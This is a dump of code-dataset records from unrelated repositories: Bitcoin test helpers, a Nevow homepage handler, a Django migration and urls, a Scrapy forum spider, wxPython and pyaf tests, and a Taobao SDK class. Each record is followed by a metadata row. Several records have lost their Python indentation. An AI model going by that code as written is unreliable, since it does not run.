# So we have big transactions (and therefore can't fit very many into each block)
# create one script_pubkey
script_pubkey = "6a4d0200" #OP_RETURN OP_PUSH2 512 bytes
for i in xrange (512):
script_pubkey = script_pubkey + "01"
# concatenate 128 txouts of above script_pubkey which we'll insert before the txout for change
txouts = "81"
for k in xrange(128):
# add txout value
txouts = txouts + "0000000000000000"
# add length of script_pubkey
txouts = txouts + "fd0402"
# add script_pubkey
txouts = txouts + script_pubkey
return txouts
def create_tx(node, coinbase, to_address, amount):
inputs = [{ "txid" : coinbase, "vout" : 0}]
outputs = { to_address : amount }
rawtx = node.createrawtransaction(inputs, outputs)
signresult = node.signrawtransaction(rawtx)
assert_equal(signresult["complete"], True)
return signresult["hex"]
# Create a spend of each passed-in utxo, splicing in "txouts" to each raw
# transaction to make it large. See gen_return_txouts() above.
def create_lots_of_big_transactions(node, txouts, utxos, fee):
addr = node.getnewaddress()
txids = []
for i in xrange(len(utxos)):
t = utxos.pop()
inputs = []
inputs.append({ "txid" : t["txid"], "vout" : t["vout"]})
outputs = {}
send_value = t['amount'] - fee
outputs[addr] = satoshi_round(send_value)
rawtx = node.createrawtransaction(inputs, outputs)
newtx = rawtx[0:92]
newtx = newtx + txouts
newtx = newtx + rawtx[94:]
signresult = node.signrawtransaction(newtx, None, None, "NONE")
txid = node.sendrawtransaction(signresult["hex"], True)
txids.append(txid)
return txids
def get_bip9_status(node, key):
info = node.getblockchaininfo()
for row in info['bip9_softforks']:
if row['id'] == key:
return row
raise IndexError ('key:"%s" not found' % key)
| [
"[email protected]"
] | |
fd63524205e878b38ec89f3dc9234285d4d205c8 | db24aad1b8e813a23688cfef4603978e3356b155 | /fastagram/posts/models/__init__.py | 678b999d2e2f24295eb5a61c01ff7b53a8c99bf2 | [] | no_license | yevgnenll/fastagram | b251a9f5ce1b6b30c09c3d5ab3d23a7388a35509 | 0923588e2d6b1e8a2e15bde0e130e64765bcc0ed | refs/heads/develop | 2021-01-10T01:14:16.196153 | 2016-04-06T09:22:18 | 2016-04-06T09:22:18 | 54,695,513 | 2 | 1 | null | 2016-04-06T09:22:18 | 2016-03-25T04:57:31 | Python | UTF-8 | Python | false | false | 75 | py | from .post import Post
from .comment import Comment
from .like import Like
| [
"[email protected]"
] | |
7de8fb97bfda1fbea1f83d3bc24dd88497e0a7b5 | d2c4934325f5ddd567963e7bd2bdc0673f92bc40 | /tests/model_control/detailed/transf_None/model_control_one_enabled_None_ConstantTrend_Seasonal_Minute_LSTM.py | aac22081d0e2dc667f76605a2ce93909efa6bbb6 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | jmabry/pyaf | 797acdd585842474ff4ae1d9db5606877252d9b8 | afbc15a851a2445a7824bf255af612dc429265af | refs/heads/master | 2020-03-20T02:14:12.597970 | 2018-12-17T22:08:11 | 2018-12-17T22:08:11 | 137,104,552 | 0 | 0 | BSD-3-Clause | 2018-12-17T22:08:12 | 2018-06-12T17:15:43 | Python | UTF-8 | Python | false | false | 163 | py | import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['None'] , ['ConstantTrend'] , ['Seasonal_Minute'] , ['LSTM'] ); | [
"[email protected]"
] | |
a3c3350d331393ea83eede2ee19ca9d984c1bfd0 | 589385876626ffdf0e3a960a191eed9b90fa6eb2 | /trunk/aztk/web/user_homepage.py | 0caf42cd3ffc7a4a1681b32a784c6440e5ed2011 | [
"BSD-3-Clause"
] | permissive | BGCX261/zoto-server-svn-to-git | bb7545852bd52d6626f3b2b9c0b1d5834eb08201 | 73abf60264ae5a6b610d19e25be833f0754b160e | refs/heads/master | 2021-01-21T23:04:02.366636 | 2015-08-25T15:16:12 | 2015-08-25T15:16:12 | 41,602,694 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,309 | py | """
dyn_pages/user_homepage.py
Author: Trey Stout
Date Added: ?
User homepage. Also the starting point for all user interior pages.
"""
## STD LIBS
## OUR LIBS
from zoto_base_page import zoto_base_page
from dyn_image_handler import dyn_image_handler
from user_albums import user_albums
from user_galleries import user_galleries
from user_publish import user_publish
from feeds import feeds
from other_sizes import other_sizes
## 3RD PARTY LIBS
from twisted.web.util import redirectTo
from twisted.internet.defer import Deferred
from nevow import loaders, inevow, tags as T
class user_homepage(zoto_base_page):
local_js_includes = [
"countries.js",
"static_news.js",
"select_box.lib.js",
"pagination.lib.js",
"e_paper.lib.js",
"globber.lib.js",
"tag_cloud.lib.js",
"comments.lib.js",
"albums.lib.js",
"featured_media.lib.js",
"widget.lib.js",
"image_detail.lib.js",
"table.lib.js",
"lookahead.lib.js",
"detect.lib.js",
"third_party/swfobject.js",
"messages.lib.js"
]
page_manager_js = "managers/user_homepage.js"
def __init__(self, username):
zoto_base_page.__init__(self)
self.username = username.lower()
def _get_browse_username(self, ctx):
return self.username
def render_my_photo_link(self, ctx, data):
return '/%s/photos/' % self.username
# def get_avatar_permission():
# def handle_info(perm_info):
# if perm_info.get('view_flag', 3):
#
# d = self.app.api.permissions.get_image_permissions(self.username, user_info['avatar_id'])
# d.addCallback(handle_info)
def avatar_handler(self, ctx, size):
request = inevow.IRequest(ctx)
color_option = self._get_color_option(ctx)
bg, fg = color_option.split("_")
def handle_avatar_display(result):
if not result['can_view']:
# generic avatar
return redirectTo('/image/avatar-%d.jpg' % size, request)
else:
# browser has permission to view avatar, so show it
new_segments = [str(size), self.avatar_id]
handler = dyn_image_handler(self.username, self.app, self.log)
handler.set_segments(new_segments)
return handler
def get_auth_username(self):
d2 = Deferred()
auth_hash = request.getCookie('auth_hash')
if auth_hash:
self.auth_username = auth_hash.split(':')[0].lower()
else:
self.auth_username = ""
d2.callback(0)
return d2
# look up id
def handle_info(result):
if result[0] != 0:
return redirectTo('/image/avatar-%d.jpg' % size, request)
user_info = result[1]
# Does the user have an avatar selected
if user_info.get('avatar_id', None):
self.avatar_id = user_info['avatar_id']
# then check if username can view it
d3 = self.app.db.query("""
SELECT zoto_user_can_view_media(
zoto_get_user_id(%s),
zoto_get_image_id(zoto_get_user_id(%s), %s),
zoto_get_user_id(%s)
) AS can_view
""", (self.username, self.username, user_info['avatar_id'], self.auth_username), single_row=True)
d3.addCallback(handle_avatar_display)
return d3
else:
# generic avatar
return redirectTo('/image/bg_%s/%s/avatar-%d.jpg' % (bg, fg, size), request)
def get_user_info(result):
if result[0] != 0:
return redirectTo('/image/bg_%s/%s/avatar-%d.jpg' % (bg, fg, size), request)
return self.app.api.users.get_info(result[1], result[1])
d = get_auth_username(self)
d.addCallback(lambda _: self.app.api.users.get_user_id(self.username))
d.addCallback(get_user_info)
d.addCallback(handle_info)
return d
def child_img(self, ctx):
return dyn_image_handler(self.username, self.app, self.log)
def child_feeds(self, ctx):
return feeds(self.username, self.app, self.log)
def child_albums(self, ctx):
return user_albums(self.username)
def child_galleries(self, ctx):
return user_galleries(self.username)
def child_publish(self, ctx):
return user_publish(self.username)
def child_avatar_small(self, ctx):
return self.avatar_handler(ctx, 11)
def child_avatar_large(self, ctx):
return self.avatar_handler(ctx, 18)
def child_other_sizes(self, ctx):
return other_sizes(self.username)
def childFactory(self, ctx, name):
if name == "":
return self
setattr(user_homepage, "child_avatar.jpg", user_homepage.child_avatar_large)
setattr(user_homepage, "child_avatar-small.jpg", user_homepage.child_avatar_small)
| [
"[email protected]"
] | |
7e19b1f65c28d7e8d33d9f9df1406f25cab5200c | fb652a77dd6dba0c971ac052271e1e03ff7c0d6e | /settings/migrations/0008_auto_20181113_0656.py | 9d9fe0d0ca6b8a4d8782e2b78f2ff35543fb2503 | [] | no_license | ryosuwito/mt-commerce | 5fa8419650d8c089bc8baf75322389141b4522af | 90359dada36ab903dbf30f3ab6616a3c4ed3f655 | refs/heads/master | 2022-12-11T05:22:31.037960 | 2019-03-07T10:59:58 | 2019-03-07T10:59:58 | 169,371,940 | 0 | 0 | null | 2022-12-08T01:21:07 | 2019-02-06T07:56:27 | HTML | UTF-8 | Python | false | false | 592 | py | # Generated by Django 2.0.8 on 2018-11-13 06:56
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('settings', '0007_auto_20181113_0655'),
]
operations = [
migrations.AlterField(
model_name='footerlink',
name='addr',
field=models.CharField(blank=True, max_length=400, null=True),
),
migrations.AlterField(
model_name='headerlink',
name='addr',
field=models.CharField(blank=True, max_length=400, null=True),
),
]
| [
"[email protected]"
] | |
1055e5be5726757fa80bb3ebe93883dab06b38ae | f8ca9769a359795dc649c46e299cd9b3bfca1864 | /forum/spiders/cancer_cancerforums_spider.py | f3a2c67fe128c84d117d7c3248a56d9a73bcdde2 | [] | no_license | florencefantine/ehealth_scraper | d4093a67543f653de200e6610eaaf65842aa322f | 886ed12d0a605584796dea11b532883c1e86d09a | refs/heads/master | 2021-01-10T11:39:58.270130 | 2015-11-24T22:09:34 | 2015-11-24T22:09:34 | 45,852,359 | 1 | 6 | null | 2015-11-24T20:52:28 | 2015-11-09T16:51:54 | Python | UTF-8 | Python | false | false | 3,237 | py | # -*- coding: utf-8 -*-
import scrapy
import hashlib
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors import LinkExtractor
from scrapy.selector import Selector
from forum.items import PostItemsList
import re
from bs4 import BeautifulSoup
import logging
import string
import dateparser
import time
# Spider for crawling Adidas website for shoes
class ForumsSpider(CrawlSpider):
name = "cancer_cancerforums_spider"
allowed_domains = ["www.cancerforums.net"]
start_urls = [
"http://www.cancerforums.net/forums/13-Lung-Cancer-Forum",
"http://www.cancerforums.net/forums/14-Prostate-Cancer-Forum"
]
rules = (
# Rule to go to the single product pages and run the parsing function
# Excludes links that end in _W.html or _M.html, because they point to
# configuration pages that aren't scrapeable (and are mostly redundant anyway)
Rule(LinkExtractor(
restrict_xpaths='//h3/a[@class="title"]',
), callback='parsePostsList'),
# Rule to follow arrow to next product grid
Rule(LinkExtractor(
restrict_xpaths='//span[@class="prev_next"]/a[@rel="next"]'
), follow=True),
)
def cleanText(self, str):
soup = BeautifulSoup(str, 'html.parser')
return re.sub(" +|\n|\r|\t|\0|\x0b|\xa0",' ',soup.get_text()).strip()
def getDate(self,date_str):
# date_str="Fri Feb 12, 2010 1:54 pm"
try:
date = dateparser.parse(date_str)
epoch = int(date.strftime('%s'))
create_date = time.strftime("%Y-%m-%d'T'%H:%M%S%z", time.gmtime(epoch))
return create_date
except Exception:
#logging.error(">>>>>"+date_str)
return date_str
# https://github.com/scrapy/dirbot/blob/master/dirbot/spiders/dmoz.py
# https://github.com/scrapy/dirbot/blob/master/dirbot/pipelines.py
def parsePostsList(self,response):
sel = Selector(response)
posts = sel.xpath('//ol[@class="posts"]/li[@class="postbitlegacy postbitim postcontainer old"]')
condition = "cancer"
items = []
topic = response.xpath('//h1/span[@class="threadtitle"]/a/text()').extract_first()
url = response.url
for post in posts:
item = PostItemsList()
item['author'] = post.xpath('.//div[@class="popupmenu memberaction"]/a/strong/text()').extract_first()
item['author_link'] = post.xpath('.//div[@class="popupmenu memberaction"]/a/@href').extract_first()
item['condition'] = condition
item['create_date'] = self.getDate(post.xpath('.//span[@class="date"]/text()').extract_first().replace(',','').strip())
item['domain'] = "".join(self.allowed_domains)
item['post'] = re.sub(r'\s+',' ',self.cleanText(" ".join(post.xpath('.//div[@class="content"]//blockquote/text()').extract())))
# item['tag']=''
item['topic'] = topic
item['url']=url
items.append(item)
return items
| [
"[email protected]"
] | |
792fba203b2bf6fd8ce56981e0f9ed7dc868c823 | 4e879e994720100a9354895af2bb9be33b38a42b | /xUdemy_tkinter/Sect3_1stTkinterApp/45_HelloWorld_01.py | 6391cf50cb181338076904a71e1464d8797f5147 | [] | no_license | pepitogrilho/learning_python | 80314ec97091238ed5cc3ed47422d2e6073a3280 | bbdc78a9a0513c13d991701859bcfe7a8e614a49 | refs/heads/master | 2023-04-09T15:07:08.866721 | 2023-04-02T18:45:47 | 2023-04-02T18:45:47 | 230,527,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 110 | py | # -*- coding: utf-8 -*-
"""
"""
import tkinter as tk
from tkinter import ttk
root = tk.Tk()
root.mainloop()
| [
"[email protected]"
] | |
9618d0ea8bcd0e39563734aa75c10cfbf72a6dde | bbd69601912a3361d788efd03a47f9d4e3bac09e | /unittests/test_propgriddefs.py | ba6c67748213bd2fab4de8c1bcd982fff4d23034 | [] | no_license | wxWidgets/Phoenix | 56929484460a0399a8f1d9582bc77c20aa14748d | a1184286703cf24c4b88e5bc14cf2979c1b1ea00 | refs/heads/master | 2023-09-01T07:10:17.437093 | 2023-08-31T05:38:01 | 2023-08-31T05:38:01 | 5,078,061 | 2,268 | 677 | null | 2023-09-09T17:06:59 | 2012-07-17T06:22:25 | Python | UTF-8 | Python | false | false | 1,278 | py | import unittest
from unittests import wtc
import wx
import wx.propgrid as pg
#---------------------------------------------------------------------------
class propgriddefs_Tests(wtc.WidgetTestCase):
def test_propgriddefs1(self):
pg.PG_INVALID_VALUE
pg.PG_DONT_RECURSE
pg.PG_BASE_OCT
pg.PG_BASE_DEC
pg.PG_BASE_HEX
pg.PG_BASE_HEXL
pg.PG_PREFIX_NONE
pg.PG_PREFIX_0x
pg.PG_PREFIX_DOLLAR_SIGN
pg.PG_KEEP_STRUCTURE
pg.PG_RECURSE
pg.PG_INC_ATTRIBUTES
pg.PG_RECURSE_STARTS
pg.PG_FORCE
pg.PG_SORT_TOP_LEVEL_ONLY
pg.PG_FULL_VALUE
pg.PG_REPORT_ERROR
pg.PG_PROPERTY_SPECIFIC
pg.PG_EDITABLE_VALUE
pg.PG_COMPOSITE_FRAGMENT
pg.PG_UNEDITABLE_COMPOSITE_FRAGMENT
pg.PG_VALUE_IS_CURRENT
pg.PG_PROGRAMMATIC_VALUE
pg.PG_SETVAL_REFRESH_EDITOR
pg.PG_SETVAL_AGGREGATED
pg.PG_SETVAL_FROM_PARENT
pg.PG_SETVAL_BY_USER
pg.PG_LABEL
pg.PG_LABEL_STRING
pg.PG_NULL_BITMAP
pg.PG_COLOUR_BLACK
pg.PG_DEFAULT_IMAGE_SIZE
#---------------------------------------------------------------------------
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
53a4aac191b28eea03daa7302e8977d24061472a | e8cac4db53b22a28f7421ede9089bd3d4df81c82 | /TaobaoSdk/Domain/AuthorizeMessage.py | 3d3a557b07f3221566eec45fb68865e80848f9d1 | [] | no_license | wangyu0248/TaobaoOpenPythonSDK | af14e84e2bada920b1e9b75cb12d9c9a15a5a1bd | 814efaf6e681c6112976c58ec457c46d58bcc95f | refs/heads/master | 2021-01-19T05:29:07.234794 | 2012-06-21T09:31:27 | 2012-06-21T09:31:27 | 4,738,026 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,921 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim: set ts=4 sts=4 sw=4 et:
## @brief 增量API
# @author [email protected]
# @date 2012-06-09 16:55:43
# @version: 0.0.16
from datetime import datetime
import os
import sys
import time
def __getCurrentPath():
return os.path.normpath(os.path.join(os.path.realpath(__file__), os.path.pardir))
if __getCurrentPath() not in sys.path:
sys.path.insert(0, __getCurrentPath())
## @brief <SPAN style="font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">增量API</SPAN>
class AuthorizeMessage(object):
def __init__(self, kargs=dict()):
super(self.__class__, self).__init__()
## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">ISV的AppKey</SPAN>
# <UL>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">String</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">12023790</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN>
# </LI>
# </UL>
self.app_key = None
## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">授权用户的淘宝昵称</SPAN>
# <UL>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">String</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">我是一个用户名</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN>
# </LI>
# </UL>
self.nick = None
## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">用户的授权开始时间。授权当天开始计算。start_date是每个授权周期开始的时间,如果这个周期没有结束用户就延长或修改了授权周期,这个开始时间是不会变的,除非这个周期结束以后再重新开始新的周期,这个字段才会被改变</SPAN>
# <UL>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Date</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">2000-01-01 00:00:00</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN>
# </LI>
# </UL>
self.start_date = None
## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">用户的授权到期时间</SPAN>
# <UL>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Date</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">2000-01-01 00:00:00</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN>
# </LI>
# </UL>
self.end_date = None
## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">用户创建授权给当前ISV的时间</SPAN>
# <UL>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Date</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">2000-01-01 00:00:00</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN>
# </LI>
# </UL>
self.created = None
## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">用户的授权信息修改时间</SPAN>
# <UL>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Date</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">2000-01-01 00:00:00</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN>
# </LI>
# </UL>
self.modified = None
## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">用户的授权状态:normal(正常),expired(过期)</SPAN>
# <UL>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">String</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">normal</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN>
# </LI>
# </UL>
self.status = None
## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">用户的授权是否已经生效(生效表示能够收到变更消息)</SPAN>
# <UL>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Boolean</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN>
# </LI>
# </UL>
self.valid = None
self.__init(kargs)
def _newInstance(self, name, value):
propertyType = self._getPropertyType(name)
if propertyType == bool:
return value
elif propertyType == datetime:
format = "%Y-%m-%d %H:%M:%S"
return datetime.strptime(value, format)
elif propertyType == str:
return value.encode("utf-8")
else:
return propertyType(value)
def _getPropertyType(self, name):
properties = {
"app_key": "String",
"nick": "String",
"start_date": "Date",
"end_date": "Date",
"created": "Date",
"modified": "Date",
"status": "String",
"valid": "Boolean",
}
nameType = properties[name]
pythonType = None
if nameType == "Number":
pythonType = int
elif nameType == "String":
pythonType = str
elif nameType == 'Boolean':
pythonType = bool
elif nameType == "Date":
pythonType = datetime
elif nameType == 'Field List':
pythonType == str
elif nameType == 'Price':
pythonType = float
elif nameType == 'byte[]':
pythonType = str
else:
pythonType = getattr(
sys.modules[os.path.basename(
os.path.dirname(os.path.realpath(__file__))) + "." + nameType],
nameType)
return pythonType
def __init(self, kargs):
if kargs.has_key("app_key"):
self.app_key = self._newInstance("app_key", kargs["app_key"])
if kargs.has_key("nick"):
self.nick = self._newInstance("nick", kargs["nick"])
if kargs.has_key("start_date"):
self.start_date = self._newInstance("start_date", kargs["start_date"])
if kargs.has_key("end_date"):
self.end_date = self._newInstance("end_date", kargs["end_date"])
if kargs.has_key("created"):
self.created = self._newInstance("created", kargs["created"])
if kargs.has_key("modified"):
self.modified = self._newInstance("modified", kargs["modified"])
if kargs.has_key("status"):
self.status = self._newInstance("status", kargs["status"])
if kargs.has_key("valid"):
self.valid = self._newInstance("valid", kargs["valid"])
| [
"[email protected]"
] | |
36f68e24f00be8957d914c829267f443aa391fd7 | 6e373b40393fb56be4437c37b9bfd218841333a8 | /Level_8/Lecture_8/Lecture_8/urls.py | 7ab7ccb82c8b8800412050eedcb9ac79244bbb63 | [] | no_license | mahto4you/Django-Framework | 6e56ac21fc76b6d0352f004a5969f9d4331defe4 | ee38453d9eceea93e2c5f3cb6895eb0dce24dc2b | refs/heads/master | 2023-01-22T01:39:21.734613 | 2020-12-04T03:01:17 | 2020-12-04T03:01:17 | 318,383,854 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 801 | py | """Lecture_8 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from enroll import views
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.home),
]
| [
"[email protected]"
] | |
39e9192043571cd8f92f301ed58923d316e6ea5b | 15863dafe261decf655286de2fcc6e67cadef3d8 | /website/apps/advisor_portal/views/loan_profile_v1.py | 22f8087c08cbb5b4ecde950fc3832e48e7998731 | [] | no_license | protoprojects/worksample | 5aa833570a39d5c61e0c658a968f28140694c567 | f1a8cd8268d032ea8321e1588e226da09925b7aa | refs/heads/master | 2021-06-26T17:34:10.847038 | 2017-09-14T00:14:03 | 2017-09-14T00:14:03 | 103,463,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,040 | py | import logging
import datetime
from django.db.models import Prefetch, BooleanField, Case, Value, When, Q
from django.http import Http404
from rest_framework import viewsets, decorators, status, filters
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.settings import api_settings
from rest_framework_extensions.mixins import NestedViewSetMixin
from advisor_portal.views.mixins import AdvisorTokenAuthMixin
from advisor_portal.filters import LoanProfileInProgressFilter
from advisor_portal.views import CRUD_ACTIONS, ENDPOINT_PROPERTY_METHODS
from advisor_portal.views.mixins import AdvisorSetMixin
from advisor_portal.views.loan_profile_v1_common import (
AdvisorLoanProfileV1BorrowerBaseView, BorrowerResourcesMixin,
CoborrowerResourcesMixin, CommonAddressView,
RestrictKindCreation, RestrictIncomesKindCreation,
HoldingAssetsOwnershipMixin, SelectForUpdateMixin, LiabilitiesRestrictionMixin,
)
from advisor_portal.paginators import (
SmallLimitOffsetPagination, LargePagePagination
)
from advisor_portal.permissions import (
AllowAdvisorPermission, LoanProfileModifyOperationsPermission,
)
from advisor_portal.serializers.loan_profile_v1 import (
AddressV1Serializer,
AdvisorLoanProfileV1ComplexSerializer,
BorrowerV1Serializer,
CoborrowerV1Serializer,
CreditRequestResponseSerializer,
EmploymentV1Serializer,
ExpenseV1Serializer,
HoldingAssetV1Serializer,
InsuranceAssetV1Serializer,
VehicleAssetV1Serializer,
IncomeV1Serializer,
LiabilityV1Serializer,
LoanProfileV1Serializer,
)
from loans.models import (
